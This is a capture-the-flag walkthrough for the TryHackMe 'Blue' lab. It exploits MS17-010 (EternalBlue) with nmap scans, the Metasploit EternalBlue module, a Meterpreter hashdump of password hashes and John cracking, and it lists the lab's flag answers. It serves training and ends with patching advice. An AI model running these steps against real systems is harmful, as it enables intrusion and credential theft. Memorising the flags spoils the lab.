← Back to Write-ups Easy

TryHackMe: Blue — EternalBlue (MS17-010) Walkthrough

TryHackMe Oct 20, 2024 by Rishabh Yadav
eternalbluemetasploitwindowssmb

Overview

Blue is a beginner-friendly Windows machine on TryHackMe that teaches exploitation of the MS17-010 (EternalBlue) vulnerability — the same exploit used in the devastating WannaCry ransomware attack of 2017.

Recon

1

nmap -sC -sV -oN nmap/blue 10.10.x.x

Key findings:

  • Port 135 (MSRPC)
  • Port 139 (NetBIOS)
  • Port 445 (SMB) — Microsoft Windows 7 Professional
  • SMB signing disabled

Enumeration

Ran Nmap’s vuln scripts against SMB:

1

nmap --script=smb-vuln* -p445 10.10.x.x

Confirmed the target is vulnerable to MS17-010 (EternalBlue).

Exploitation

Launched Metasploit and used the EternalBlue exploit:

1
2
3
4
5

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.x.x
set LHOST tun0
run

The exploit succeeded, providing a Meterpreter session with NT AUTHORITY\SYSTEM privileges — the highest level on Windows.

Post-Exploitation

Hashdump

1

hashdump

Dumped all password hashes from the SAM database. Cracked the admin hash using John:

1

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Flag Capture

Used the Meterpreter search command to find all flag files:

1
2
3
4

search -f flag*.txt
cat "C:\\flag1.txt"
cat "C:\\Windows\\System32\\config\\flag2.txt"
cat "C:\\Users\\Jon\\Documents\\flag3.txt"

Flag 1: flag{access_the_machine}

Flag 2: flag{sam_database_elevated_access}

Flag 3: flag{admin_documents_can_be_valuable}

Flags

  1. flag{access_the_machine}
  2. flag{sam_database_elevated_access}
  3. flag{admin_documents_can_be_valuable}

Key Takeaways

  • EternalBlue remains one of the most impactful vulnerabilities in history
  • Always patch systems — MS17-010 has had a fix since March 2017
  • SMB should never be exposed to the internet
  • Meterpreter provides powerful post-exploitation capabilities for further assessment